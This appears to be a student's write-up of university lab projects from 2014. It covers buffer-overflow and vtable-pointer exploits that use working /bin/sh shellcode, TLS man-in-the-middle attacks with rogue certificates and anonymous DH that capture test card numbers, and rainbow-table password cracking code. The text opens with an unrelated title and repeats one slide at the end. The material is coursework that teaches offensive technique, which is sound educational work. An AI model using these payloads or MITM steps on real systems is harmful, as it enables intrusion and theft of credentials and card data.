Linux Kernel, tested by the Linux-version of PVS-Studio
Computer Security
1. Buffer overflows knowledge requirements :
C/C++
Assembly
program memory allocation
Linux permissions.
There are three users on the same Linux machine with a secret.txt file each one.
Each of the users (superuser, hyperuser, masteruser) have an executable on their
directory which can be executed by all the other users. When executing the program
users will have the owners permissions and not the permissions of the user executing it.
The goal we trying to succeed is to to create a Shell running from the executables with
the victim's privileges by overwriting a usefull address/bit.
Superuser:
program: convert.c
without any protection against buffer overflows
Hyperuser:
program: arpsender.c
uses a canary to protect against buffer overflows.
Masteruser:
program: zoo.cpp
must be exploited using the VPTR.
2. Kotsomitopoulos Aristotelis
Project #1 ΥΣ13 ΕΑΡΙΝΟ 2014 (computer system security)
SuperUser
Here we just try to place in our RET address a value inside our buffers first NOPS, so
our ip will continue until it finds our SHELLCODE!
our buffer will look like [NOP NOP NOP NOP...SHELLCODE...ADDR ADDR ADDR ADDRR]
for exaple we can use 820 size buffer to be sure we overwrite the RET value with ADDR
we can use Exploit3.c from Alef with value 820 = 720(our date buffer ) + 100 (is a good
choice)so we create easily the above buffer and we can use :
/home/superuser$ ./convert a $EGG (our ENVIROMENTAL var)(code at last page)
to open our shell... an alternative way is to work like the HYPERUSER and create a bash
script that simply modify the RET value with ADDR at once(almost the same with alef)
using command : "info locals" we can find our date buffer start address and we can add
a bit offset to overwrite our address, and with "info f" we can check when our RET value
is overwrited with the NOPS address or the start of our shellcode and we are DONE!!
---------------------------------------
supersecret.txt
---------------------------------------
$ cat supersecret.txt
One is is three in any people a of is in called In example read
a is the simply into parts to How is each the itself?
possible the that about is a interesting discussed
later orutnFolvthlleroj
SERIAL:1399762801-
c9a58cf2a26af87ec9de1745f2eaed5f298dae7581b6dcd7d77d1eaa33104fad7031c4f9814bdcc3e5
72b8e0476c1e1aa0c1eb3523756beeaa1b4ee0d67d1c72
3. HyperUser
Firstly i hacked hyperuser using the follow script :
With the above instructions i succeed to jump to my RET address without touching
the canary by using a vulnerable pointer.
4. Hyperscript.sh (original code at last page)
//chmod +x Hyperscript.sh
#!/bin/bash
`perl -e 'printf
#buffer address before shell code on NOPS
"x1exa0x04x08" .
#our 5th letter we wanna have 140 ascii value
chr(140) .
#we add 60 x NOPS
"x90" x 60 .
#we add Shell Code
"xebx1fx5ex89x76x08x31xc0x88x46x07
x89x46x0cxb0x0bx89xf3x8dx4ex08x8dx56
x0cxcdx80x31xdbx89xd8x40xcdx80
xe8xdcxffxffxff/bin/sh"
#we add 10 x NOPS
"x90" x 10 .
#we add RET address to our vulnerable pointer
"AAAABAAACAAAAADAAAAx8cxf6xffxbf";' > output.txt`
---------------------------------------
HYPERSECRET.txt
---------------------------------------
$ cat hypersecret.txt
interesting how possible people, general number
to secret text. something cryptography secret this that
right simple presented text divided three and three much
leaked share secret Is to secret no the leaked share? questions in on! nalisr inengeect
SERIAL:1400202302-
bc1977e5b8b6526c4065fc92591f912e95075079bee1f1c6ae6d7b4b40390b9ece61342f212c1f5cf
87cb0be4df16698c49f51191d7f417e067bf90db0b7f536
5. MasterUser
we overwrite the VPTR at the end of our first buffer[256] and we need to call ("-s") in
order for the virtual function to be called..
we must create a "virtual Vtable" in our buffer to confuse our program and for example
if our pointer try to call an overload
operator or a print function from vtable it will load
our shellcode... so our form is :
using “info f” with break 13 we can find our THIS address or our class
VTABLE starts at 0x804a008 so we want to replace vptr with 0x804a008+4 so it will
point there and inside the 0x804a008+4 we will place our nops or shellcode address.
Lets have a better look:
6. so now our SELLCODE can be Executed :
std10048@sbox:/home/masteruser$ ./zoo -c `perl -e 'printf
"x18xa0x04x08x18xa0x04x08x18xa0x04x08x90x90x90x90xeb
x1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08x8
dx56x0cxcdx80x31xdbx89xd8x40xcdx80
xe8xdcxffxffxff/bin/sh" . "A" x 195 . "x0cxa0x04x08" x 8 ;'` -s
we could avoid placing 8x addresses at the end if we have counted byte by byte exactly
the Vptr location.
---------------------------------------
MASTERSECRET.txt
---------------------------------------
$ cat mastersecret.txt
question it for or for of share piece This that is sharing.
little you now solution where is vertically different distributed parties.
information from about passage it divide so information secret by
These will class Cgtao!sog haofpone
SERIAL:1400759702-
8f9a1fe300998d1d45bdaf99740699fcc68786fb04d9c83b8056d6839f3aed2c66446bb9d17c5c1cf
c6b3c4da35af78504713ab70b4c5082eae2f4ab44c3c7b2
7. Final TEXT SUPER+HYPER+MASTER
#include<iostream>
#include<string>
#include<fstream>
using namespace std;
int main(void){
ifstream super,hyper,master;
super.open("superuser.txt");
hyper.open("hyperuser.txt");
master.open("masteruser.txt");
string Sword[37],Hword[38],Mword[37]; //wc -w filename.txt
int i=0;
while(super >> Sword[i]){
i++;
}
i = 0;
while(hyper >> Hword[i]){
i++;
}
i = 0;
while(master >> Mword[i]){
i++;
}
for (i = 0;i<37; i++){
cout<<Sword[i]<<" "<<Hword[i]<<" "<<Mword[i]<<" ";
}
cout<<Hword[37]<<endl;
return 0;
}
So Our Final Text:
One interesting question is how it is possible for three people, or in general for
any number of people to share a secret piece of text.
This is something that in cryptography is called secret sharing. In this little
example that you read right now a simple solution is presented where the text is
simply divided vertically into three different parts and distributed to three
parties.
How much information is leaked from each share about the secret passage itself? Is
it possible to divide the secret so that no information about the secret is leaked
by a share? These interesting questions will discussed in class later on!
Cgtao!sog orutnFolvthlleroj nalisr haofpone inengeect
9. Man-in-the-middle attack to TLS (RFC 52461) Protocol
An online shop webshop.com in the address https://sbox.di.uoa.gr/
and 6 different clients that they try to connect to the workshop via TLS.
The webshop has a certificate singed up by the certification authority Compsec CA
All clients have access in the self-singed certificate of the Compsec CA.
With each ssh connection in the sbox.di.uoa.gr the 6 clients will try to connect with the
webshop.(one each time)
Display Message:
timestamp: XXXXXXXXXX
forwarding webshop client requests to port YYYYY
clients because of a misconfiguration will try to connect to YYYY instead of (443) port
of the webshop.So now we have the ability for the man-in-the-midle-attack.
Difficulty
1. Mr. Blonde. X
2. Mr. Blue. XX
3. Mr. Brown. XX
4. Mr. Orange. XX
5. Mr. Pink. XXXX
6. Mr. White. XXXXX
10. Kotsomitopoulos Aristotelis
Project #2 ΥΣ13 ΕΑΡΙΝΟ 2014 (computer system security)
Firstly Lets Create a certification authority(CA)
my folder is “std10048@sbox:~/myProject2$”
we execute the following:
cp /etc/ssl/openssl.cnf . (we modify the ./demoCA to ./)
mkdir certs csr newcerts private
echo 00 > serial
echo 00 > crlnumber
touch index.txt
openssl req -new -x509 -extensions v3_ca -keyout private/cakey.key -out cacert.crt
-days 3650 -config ./openssl.cnf
openssl ca -gencrl -keyfile private/cakey.key -cert cacert.crt -out crl.pem -config
./openssl.cnf
with are my informations for CA
so now we have our CA and our folders created
they look something like this :
11. Now that we have our CA created lets generate a certificate using our CA
Lets hack firstly Mr.Blond !
He is a realy idiot client he checks almost nothing so :
openssl genrsa 1024 > private/MrBlond.key && openssl req -new -key
private/MrBlond.key -out csr/MrBlond.csr -config ./openssl.cnf
so now lets continue with this command to complete our generation and then
we dont even need to verify with CA for that client.
openssl ca -config openssl.cnf -policy policy_anything -cert cacert.crt -keyfile
private/cakey.key -days 365 -out certs/MrBlond.crt -infiles csr/MrBlond.csr
12. so now we have our .crt and our .key
std10048@sbox:~/myProject2/certs$ cat MrBlond.crt
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 0 (0x0)
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=GR, ST=ATTICA, L=Athens, O=University of Athens, OU=Department of Informatics and
Telecommunications, CN=SBOX CA/emailAddress=csec.di@gmail.com
Validity
Not Before: Jun 7 13:02:45 2014 GMT
Not After : Jun 7 13:02:45 2015 GMT
Subject: C=GR, ST=ATTICA, L=Athens, O=Uoa, OU=DiT,
CN=idiot_Client/emailAddress=idiot_client@gmail.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (1024 bit)
Modulus:
00:be:c7:07:e7:80:9a:ab:12:78:04:97:04:5e:2a:
6d:31:7b:29:1a:3e:78:10:f3:cb:b4:ed:f1:f9:87:
b3:72:57:01:ae:1f:2f:33:95:ba:cd:64:b5:20:37:
0d:cb:c8:df:eb:ff:e9:ca:47:1d:db:b6:2c:bb:35:
4f:66:2f:6a:c9:c0:2b:f1:12:fc:f1:58:72:03:b1:
8b:56:bf:44:14:af:ed:a6:0b:9c:92:2d:3b:e3:59:
9e:6d:32:cf:e4:cd:06:ff:af:dc:f2:d0:1b:1e:98:
b6:73:07:37:c3:a6:38:47:b1:7d:d3:d8:e4:f0:b5:
3b:4a:7f:fb:8e:af:7a:73:95
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
OpenSSL Generated Certificate
X509v3 Subject Key Identifier:
14. Now we can run twestedeve like that :
command:
twistedeve -c certs/MrBlond.crt -k private/MrBlond.key -a localhost:10048 -t
localhost:443 -b localhost:46619
so we can be the man in the middle. After commands execution we open new terminal we
login we find the correct port (46619 this time) for our connection and our Mr.BLond
Client have been hacked :
So this is First Client Credid card and timestamp
'cc=4916105057678726×tamp=1402146284'
Now lets hack Mr.Blue ( i named it brown )
he is more `clever` than Mr.Blond but he has another vulnerability
he checks company name so with our previous CA we create a new certificate
but this time we insert in
common name field
“sbox.di.uoa.gr “ so:
15. so we simply again run twistedeve and :
twistedeve -c certs/brown.crt -k private/brown.key -a localhost:10048 -t
localhost:443 -b localhost:48211
so we can observe Mr.Blue credit card and timestamp :
'cc=4556270584159924×tamp=1402148722'
now lets hack Mr.Brown we know that webshop and mysite have both the same
Cartification Authority (sbox CA) so Mr.Brown Checks only if our .crt and our .key are
verified by SBOX CA and nothing more so:
SBOX CA
mysite.com webshop.com
we use twestedeve with /var/project2/mysite.com.crt and
/var/project2/mysite.com.key
and now we can get Mr.Brown credit card !
16. Command :
twistedeve -c /var/project2/mysite.com.crt -k /var/project2/mysite.com.key -a
localhost:10048 -t localhost:443 -b localhost:46749
So here is credit & timestamp for Mr.Brown
'cc=4539346713524865×tamp=1402150208'
Mr.Orange now : we will use certification chain
we now know how to create CA generate certifications and sign with them.. so now
lets try something different!
In our new folder after those commands :
cp /etc/ssl/openssl.cnf .
mkdir certs csr newcerts private
echo 00 > serial
echo 00 > crlnumber
touch index.txt
instead of using :
openssl req -new -x509 -extensions v3_ca -keyout private/cakey.key -out cacert.crt
-days 3650 -config ./openssl.cnf
17. the above command will create a brand new cakey.key and cacert.crt file we will use our
existing ones from mysite.com , so we navigate to /var/project2/ and we copy our
mysite.com.key and our mysite.com.crt :
now lets create the two files in order to use correctly our next command
we create cacert.crt and /private/cakey.key
and we paste our coped contents from mystie
now we can use the generation command with our custom files!
openssl ca -gencrl -keyfile private/cakey.key -cert cacert.crt -out crl.pem -config
./openssl.cnf
now we will generate our certificate using the above CA :
openssl genrsa 1024 > private/sbox.di.uoa.gr.key && openssl req -new -key
private/sbox.di.uoa.gr.key -out csr/sbox.di.uoa.gr.csr -config ./openssl.cnf
openssl ca -config openssl.cnf -policy policy_anything -cert cacert.crt -keyfile
private/cakey.key -days 365 -out certs/sbox.di.uoa.gr.crt -infiles
csr/sbox.di.uoa.gr.csr
18. so now lets create our certification chain we will paste in our /certs/sbbox.di.uoa.gr.crt
our mysite.com pure certificate so there will be our expected confusuin from our client
and our “man in the middle” will purchase victims credid card number
------BEGIN CERTIFICATE-----
.....
our above created certificate code
.....
------END CERTIFICATE------
------BEGIN CERTIFICATE-----
.....
mtsite.com certificate code
.....
------END CERTIFICATE------
19. so our file will look something like this:
our certificate
copyed from
mysite.com.crt
now we can start twistedeve and try our .crt and .key lets see :
twistedeve -c certs/sbox.di.uoa.gr.crt -k private/sbox.di.uoa.gr.key -a
localhost:10048 -t localhost:443 -b localhost:41866
our man in the middle listen at port 41866
we login and realise that Mr.Orange has been hacked
20. credit card successful attack!
So our credit card number & timestamp is :
'c=4716666995541278×tamp=1402231087'
For Mr.Pink now. Lets try to use twistedeve with a filter and without using certificate:
twistedeve -c -f /var/project2/filters/tlsinfo.py -a localhost:10048 -t
localhost:443 -b localhost:41866
so we can see what client and server protocols etc supports.
We can see that client 5 Mr.Pink uses TLS_DH_anon_WITH_AES.. so here
is the problem we can create an openssl custom server that will listen in a port “4444”
then we will redirect with twistedeve our users to that port and with our openssl server
would be set with no certificate is used option. This restricts the cipher suites available
to the anonymous ones (currently just anonymous DH).
21. Here we can see that we use that DH_anon!
So now lets create our openssl server :
openssl s_server -accept 44444 -nocert -cipher DH
(cipher suites using DH including anonymous DH)
so now we can run twistedeve like that :
twistedeve -c -a localhost:10048 -t localhost:44444 -b localhost:43566 (clients
port)
so lets run our clients at port(43566) with our server and twistedeve opened(we
need three terminals)
so ALL clients will fail except Mr.Pink so we will be able to steal his credit card!
22. Mr.Pink request sent
everything else failed!
Credit card and timestamp
So Mr.Pinks Credit Card & Timestamp is :
4486750853453368×tamp=1402274478
Mr.White has a complete TLS protection so he needs a more powerful hacker to be
hacked!!!
23. Rainbow Tables
Kotsomitopoulos Aristotelis
Project #3 ΥΣ13 ΕΑΡΙΝΟ 2014 (Computer System Security)
I want to hack a password of 6 chars, those chars must have been created from
the given alphabet.
Alphabet:(64)
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@"
so a password example can be “AriS1@”.
In order to hack this password i will use rainbow tables!
passwords are stored as the output of a hash function. Hashes are one-way operations.
Even if an attacker gained access to the hashed version of your password, it's not
possible to reconstitute the password from the hash value alone but its possible to
attack the hashed value of your password using rainbow tables.
We have 64^6 different password = 68.719.476.736 = 69 billion different passes
First of all i create for example 1.000.000 different passwords 6 char long and this will
be the start of my chain something like :
!!!7B0
!!!80!
QBLfQU
VM7Ucl
eORyLL
lXO8rC
t9p48R
8Qi!cm
8QjgAU
I3m2Zn
.....
...
now for every plaintext of the above we will create a chain
plaintext ->
hash = blake(plaintext) ->
new_plaintext = my_reduction_function(hash) ->
hash = blake(new_plaintext) -> repeat.....->......->....
in my program i create a chain 10.000 long so for every plaintext i use
24. blake+my_reduction_function (10000 times).
Finally i will have almost 1.000.000 x 10000 = 10 billion different values (without
collisions) so if we had 1 password given i have 1/7 possibilities to hack it
but now i have more than 15 password given so that size is enough with a bit of luck...
to generate that size of rainbow table took more than 16 hours... in my ophinion the best
size for that problem would be 5 million x 10.000 but that need alot lot lot of time to be
generated even with threads and multicore processor!
So after that huge generating i place the results in a .txt file an my search-find
password program will use that table to hack the password.. the file will look like this :
output_1mX10000.txt
!!!7B0 77240e13ebff7ea020e62d90975cd17963fa818bec3f55836e2fcd4780ea48d9 (1)
!!!80! f55715be2179b0fb9d3f83bdb39fed8374afcbaea9213e4f2001a0b8734a0765(2)
!!!80Z 3410c7d80d27f5bd489f5dd5c0533043c6ce17c363f8ab7acf7b91511df5ac96(3)
!!!YI2 1657ca495a203164edc363700c86adbe54374edc05cf474e70030a842f76da68(4)
!!!oC@ 0f1e9b44a2441c46f0c525f5c22777c4f009ec1b0f5776604b42639cf230648f(5)
!!!uZW d2953ba6e7074c76c0461eb8ec7d7c36bcb434001284abba8d0c92d6bd892f7a(6)
!!07fO 5b9ef9c41b5444476e2c66e050c795031185f42bfc40bf8f174f1e0e3bb8f581(7)
!!0JB0 7a73cb5357eb35ecfc82ebc351112824c54bdaa70603fe5262e21f22fd13cd60(8)
!!0R7U 6ffdb183126ca9e70b659ea45f4dcb0ca78c7136f72fa733bb960d315eca19a0(9)
!!0XJ6 85b0c65a867e08b6ae7d7d65ddae3c6e4def38ad805cbb96b75a49884928852b(10)
!!0fNM 790fe297f6ca448cdd97e083176ad3e492258ea2167f9048119da9dcbfaa12d9(11)
!!0kyY 5498173ef57774579a8095eb6d32a2bee8cac4bf9153ddda011ab33d600d6257(12)
!!0rik 73288f5ab7e7fc5b1d2a387dacc6401b24c422494d5d4f6ad280e4d046b83327(13)
!!1wh0 98f12f574918ff51e92369c38d9369d474b2f2bf0291d79e6bb3be71ed7abd2d(14)
.......
...............
........................
.............................
zzxEpx f9042996c416d9f32395b0bb967aca9df277f4e8dcd14794bc60a820aa5d286f(999988)
zzxMxc c1409a47dab4ce96a013a7033c868d56888a748cf670c28b86c1413c6801fd92(999989)
zzxpFE e6dba8c5b25946070e7f680e2255a08aba46ca92fdf2e818f245ad01fb8fba03(999990)
zzxvEY f028262e61fee77d2104ef928d195d6b401fdb50522bdacad088ab0df197a756(999991)
zzyw9@ 0861fc88106fffb2e9731b5a6b67b5ffc891d19d2b8b8334c57a97ce50bf3e0a(999992)
zzz4sv bf6aef7de87249ecaee1bb8c83b1025d3c238226f1ce47999b1dbc24fd2bab6e(999993)
zzzAuV dd6e7cfa2031148cf1c22c1756bd7f5a0cb8c96e581e87cf1fb3dada8963cfee(999994)
zzzGGs 8872e669d2284297bbfe4494ced287de58ff0b60c66d3a1b46a8b7657cc1188f(999995)
zzzRqC d5859daaf422a4c73dafe382292c5e1c9dba17361d9176663658a8a48b9e3a08(999996)
zzzTe5 946a862717e78677d6eb96b25f952cdee0a91de870789b129abc1d8e4ff15eca(999997)
zzzZ67 9750c53137b46208040c93b08cc7ed1454a4fe0e1583511153291bcd0e40b393(999998)
zzzgB3 4a5af0f0a7c1b61137bcd1143d447a05c8ada3d63eade369286e807f0b9c554a(999999)
zzzyqE a36a2403b3adb9c50094866613fd2e956f500868cbc2a6ee9a99ba8ec8c41b79(1000000)
in order to reduce collisions i tried a lot of different reduction functions with
a lot of tests , in my final function in order to produce 6 char long random passwords
from a given 64 char long hash :
i map every char from the hash(16 different chars 0123456789abcdef) with
my alphabet “ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@”
i add the first 10 hash chars (ex. 0Fa2.. = 0+15+10+2..) and then i make a XOR with the
next 10 in that way i produce a number than number MOD 64 give me a number inside my
alphabet for example 63 is '@'! and for the 6th char i use the last 4 characters + 6
first in that way i produce a deterministic random string ( plaintext ) for my chain!
string plaintext_from_hash3(string my_hash){
25. string charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@";
string result;
int sum = 0;
int counter=0;
/* this is for our last XOR 50-60 with the last 4 chars + the 6 firsts! */
int last_digits = my_hash[60]+my_hash[61]+my_hash[62]+my_hash[63];
for(int i=0; i<6; i++)
last_digits += my_hash[i];
/* this is for our 5 XOR */
int for_XOR[6];
for(int i=0; i<6; i++){
sum=0;
for(int j=0; j<10; j++){
if(my_hash[counter] == '0')
sum += 0;
else if(my_hash[counter] == '1')
sum += 1;
else if(my_hash[counter] == '2')
sum += 2;
else if(my_hash[counter] == '3')
sum += 3;
else if(my_hash[counter] == '4')
sum += 4;
else if(my_hash[counter] == '5')
sum += 5;
else if(my_hash[counter] == '6')
sum += 6;
else if(my_hash[counter] == '7')
sum += 7;
else if(my_hash[counter] == '8')
sum += 8;
else if(my_hash[counter] == '9')
sum += 9;
else if(my_hash[counter] == 'a')
sum += 10;
else if(my_hash[counter] == 'b')
sum += 11;
else if(my_hash[counter] == 'c')
sum += 12;
else if(my_hash[counter] == 'd')
sum += 13;
else if(my_hash[counter] == 'e')
sum += 14;
else if(my_hash[counter] == 'f')
sum += 15;
counter++;
}
for_XOR[i] = sum;
}
int res;
res = for_XOR[0] ^ for_XOR[1]; //1st XOR
if(res<0)
res=-res;
result+=charset[res%64];
res = for_XOR[1] ^ for_XOR[2]; //2nd XOR
if(res<0)
res=-res;
result+=charset[res%64];
res = for_XOR[2] ^ for_XOR[3]; //3rd XOR
if(res<0)
res=-res;
result+=charset[res%64];
res = for_XOR[3] ^ for_XOR[4]; //4th XOR
if(res<0)
res=-res;
result+=charset[res%64];
res = for_XOR[4] ^ for_XOR[5]; //5th XOR
if(res<0)
res=-res;
result+=charset[res%64];
res = for_XOR[5] ^ last_digits; //6th XOR
if(res<0)
res=-res;
result+=charset[res%64];
return result;
}
Lets assume for example after we use dbus-monitor in sbox.di.uoa.gr we get the
26. following hash :
9b465fce3fd32aa5531f801d4c63f31380adc84c62f0d170aaf535619b85a928
so we will search if the above hash is in our table IF WE FIND IT we will use the chains
started plaintext to obtain the password we will use blake->reduction->blake->reduction..
until we find our first hash in our case it would be the last one so the plaintext that
produced this hash would be our hacked password !.. if we dont match the above hash
with our rainbow table hashes then we will use reduction function to our hash then blake
and then we will try to find it again if we find it then we will search again the correct
chain until we find the FIRST hash(not the new one)..if we fail again we will continue
hashing and reducing our given hash until we found a chain match in rainbow table.. if we
use in my situation 10.000 loops and dont find a match then we failed and that password
cant be hacks with my table..now if we find a match but after expanding the appropriate
rainbow table 10.000 and we dont find our FIRST hash then we dont stop we continue
exapning and searching for another chain MATCH!! if we check every possible chain and
the FIRST isnt there then the password cannot be hacked with that rainbow table..
if we had used a bigger one it would be almost 100% possibility our password would be
hacked!
After we hack the password we use nc localhost 4433 and we enter the password! We
have only 10 seconds to copy hash + paste it to our program + use the above command +
paste the result so its a bit hard.. my search function can make an average of 7 second
to find the result so its kinda HARD!!!
The exercise was developed using C++ in windows (CodeBlocks) and tested in linux ubuntu
all my .cpp and .h would are included in my ZIP! My rainbow table has size 100MB so i
cant include it!
So here is an example of hacking a password from hash!
with my search program..
but again my rainbow table is 10 billion without collisions so its a bit small.
![Kotsomitopoulos Aristotelis
Project #1 ΥΣ13 ΕΑΡΙΝΟ 2014 (computer system security)
SuperUser
Here we just try to place in our RET address a value inside our buffers first NOPS, so
our ip will continue until it finds our SHELLCODE!
our buffer will look like [NOP NOP NOP NOP...SHELLCODE...ADDR ADDR ADDR ADDRR]
for exaple we can use 820 size buffer to be sure we overwrite the RET value with ADDR
we can use Exploit3.c from Alef with value 820 = 720(our date buffer ) + 100 (is a good
choice)so we create easily the above buffer and we can use :
/home/superuser$ ./convert a $EGG (our ENVIROMENTAL var)(code at last page)
to open our shell... an alternative way is to work like the HYPERUSER and create a bash
script that simply modify the RET value with ADDR at once(almost the same with alef)
using command : "info locals" we can find our date buffer start address and we can add
a bit offset to overwrite our address, and with "info f" we can check when our RET value
is overwrited with the NOPS address or the start of our shellcode and we are DONE!!
---------------------------------------
supersecret.txt
---------------------------------------
$ cat supersecret.txt
One is is three in any people a of is in called In example read
a is the simply into parts to How is each the itself?
possible the that about is a interesting discussed
later orutnFolvthlleroj
SERIAL:1399762801-
c9a58cf2a26af87ec9de1745f2eaed5f298dae7581b6dcd7d77d1eaa33104fad7031c4f9814bdcc3e5
72b8e0476c1e1aa0c1eb3523756beeaa1b4ee0d67d1c72](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)